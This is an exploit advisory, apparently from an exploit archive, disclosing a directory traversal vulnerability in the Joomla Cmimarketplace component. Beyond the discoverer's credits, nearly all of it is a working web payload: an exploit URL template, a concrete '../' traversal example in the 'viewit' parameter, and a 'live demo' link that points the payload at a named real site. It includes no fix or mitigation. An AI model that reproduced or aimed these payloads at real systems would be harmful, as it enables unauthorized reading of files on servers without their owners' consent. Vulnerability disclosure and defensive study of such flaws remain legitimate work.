The Joomla Cmimarketplace component suffers from a remote directory traversal vulnerability.
5a244bcaab6c01c220efa55bd88e930ca4fcfa8ec8b430de5d3af908e470f8ae
#############################################################################
# #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "client@ijobid.com"
[~] Author URL: "www.ijobid.com"
########################################
[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################